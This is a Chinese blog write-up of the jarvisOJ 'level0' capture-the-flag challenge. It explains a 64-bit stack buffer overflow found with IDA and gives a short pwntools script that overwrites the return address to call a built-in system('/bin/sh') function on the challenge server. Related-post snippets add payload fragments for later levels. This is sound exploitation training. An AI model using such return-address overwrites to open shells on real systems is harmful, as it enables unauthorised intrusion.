jarvisOJ-level0

最新推荐文章于 2024-03-28 11:29:55 发布
原创 最新推荐文章于 2024-03-28 11:29:55 发布 · 347 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了一个具体的ROP漏洞利用过程,通过分析jarvisOJ上的一道题目,讲解了如何使用IDA逆向工程工具找到漏洞点,构造payload,最终实现shell的获取。涉及ROP基础、IDA使用技巧及payload构造方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

jarvisOJ上的题目梯度似乎比pwnable.tw上的题目更合理点,pwnable.kr目前做的十几题都是考察各种基础,只有少数像pwn题。

level0是考最基础的ROP

先把下载的文件放进IDA里看看

.text:00000000004005C6 main            proc near               ; DATA XREF: _start+1D↑o
.text:00000000004005C6
.text:00000000004005C6 var_10          = qword ptr -10h
.text:00000000004005C6 var_4           = dword ptr -4
.text:00000000004005C6
.text:00000000004005C6 ; __unwind {
.text:00000000004005C6                 push    rbp
.text:00000000004005C7                 mov     rbp, rsp
.text:00000000004005CA                 sub     rsp, 10h
.text:00000000004005CE                 mov     [rbp+var_4], edi
.text:00000000004005D1                 mov     [rbp+var_10], rsi
.text:00000000004005D5                 mov     edx, 0Dh        ; n
.text:00000000004005DA                 mov     esi, offset aHelloWorld ; "Hello, World\n"
.text:00000000004005DF                 mov     edi, 1          ; fd
.text:00000000004005E4                 call    _write //执行write(1,"Hello, World\n",13)
.text:00000000004005E9                 mov     eax, 0
.text:00000000004005EE                 call    vulnerable_function
.text:00000000004005F3                 leave
.text:00000000004005F4                 retn
.text:00000000004005F4 ; } // starts at 4005C6
.text:00000000004005F4 main            endp

var_10和var_4不理解是干什么的,可能是main()函数里的参数。

然后就是write函数,从标准输出(fd=1)输出13个字节长度的字符串,即write(1,"Hello, World\n",13)

接着看main函数结束前执行的vulnerable_function函数

.text:00000000004005A6 vulnerable_function proc near           ; CODE XREF: main+28↓p
.text:00000000004005A6
.text:00000000004005A6 buf             = byte ptr -80h
.text:00000000004005A6
.text:00000000004005A6 ; __unwind {
.text:00000000004005A6                 push    rbp
.text:00000000004005A7                 mov     rbp, rsp
.text:00000000004005AA                 add     rsp, 0FFFFFFFFFFFFFF80h
.text:00000000004005AE                 lea     rax, [rbp+buf]
.text:00000000004005B2                 mov     edx, 200h       ; nbytes
.text:00000000004005B7                 mov     rsi, rax        ; buf
.text:00000000004005BA                 mov     edi, 0          ; fd
.text:00000000004005BF                 call    _read
.text:00000000004005C4                 leave
.text:00000000004005C5                 retn
.text:00000000004005C5 ; } // starts at 4005A6
.text:00000000004005C5 vulnerable_function endp

看到buf地址为esp-80h(意思是距离栈顶有80h个字节),然而buf能写入的空间却是200h,所以可以直接溢出到栈顶esp之上,然后覆盖掉return里原本存放的地址

在IDA左边函数列表看到了callsystem函数,点开一看/bin/sh就在这里

.text:0000000000400596 callsystem      proc near
.text:0000000000400596 ; __unwind {
.text:0000000000400596                 push    rbp
.text:0000000000400597                 mov     rbp, rsp
.text:000000000040059A                 mov     edi, offset command ; "/bin/sh"
.text:000000000040059F                 call    _system
.text:00000000004005A4                 pop     rbp
.text:00000000004005A5                 retn
.text:00000000004005A5 ; } // starts at 400596

400596就是我们要的地址了

于是我们就可以构造payload了,'a' * 80h + esp的大小 + p64(0x0000000000400596)

#!/usr/bin/env python

# coding=utf-8

from pwn import *

socket=remote('pwn2.jarvisoj.com',9881)

playload='a'*0x80 + 'a'*8+p64(0x0000000000400596)
socket.send(playload)

socket.interactive()

(做这题的时候把esp当成32位的寄存器了,以后要养成先用checksec先检查程序的习惯)

(还有就是把80h当成80了。。记录一下第一次错误的payload 'a'*84+p32(0x00400596))

 

吾梦不尽
关注
【BUUCTF - PWN】jarvisoj_level0
古月浪子的博客
04-05 782
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
Jarvis OJ--level3
Kni9hT's Blog
11-10 298
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
jarvisoj_level0
shisuan1的博客
11-05 1947
jarvisoj_level0 通过命令检查文件类型file level0发现是64位的可执行文件 然后用64-ida打开 按F5显示伪代码,很简单这是一个hello world的程序 然后开始分析 可以看到main函数一共调用了三个函数 然后依次检查函数,检查 通过网上答案发现vunlnerable_function这个函数调用了200h的内存空间,其实作者也看不懂,建议进行这一步时先看...
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 966
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
Jarvis OJ --level4
Kni9hT's Blog
11-11 313
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 381
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 399
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 604
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
JarvisOJ-PWN-Level0
杀生丸?不,其实我要的是桔梗
03-15 822
JarvisOJ-PWN-Level0 IDA打开分析。 在Export找到这两个关键函数。 先双击进入main 关键函数在vulnerable_function(),继续跟进。 可以看出read函数是把标准输入的200位的写入buf中。 再看buf: 低位: 高位: 所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1156
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 583
[buuctf]jarvisoj_level0
buuctf之jarvisoj_level0
最新发布
weixin_54452942的博客
03-28 1571
64位(system_addr+1)的奥秘
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2557
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值